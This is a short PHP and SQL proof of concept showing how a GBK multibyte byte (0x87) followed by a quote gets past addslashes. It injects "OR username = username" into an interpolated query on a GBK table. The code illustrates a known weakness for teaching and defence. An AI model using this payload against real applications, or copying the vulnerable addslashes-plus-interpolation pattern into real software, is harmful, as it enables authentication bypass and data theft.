Example of addslashes Multibyte SQL injection

CREATE TABLE users (
    username VARCHAR(32) CHARACTER SET GBK,
    password VARCHAR(32) CHARACTER SET GBK,
    PRIMARY KEY (username)
);
$db = mysqli_init();
$db->real_connect('localhost', 'username', 'password', 'database');
$db->query('SET NAMES gbk');

$_POST['username'] = chr(0x87)."' OR username = username -- ";
$username = addslashes($_POST['username']);
$sql = "SELECT *
        FROM users
        WHERE username = '{$username}'";
$res = $db->query($sql);

if ($res->num_rows) {
    echo 'success';
} else {
    echo 'fail';
}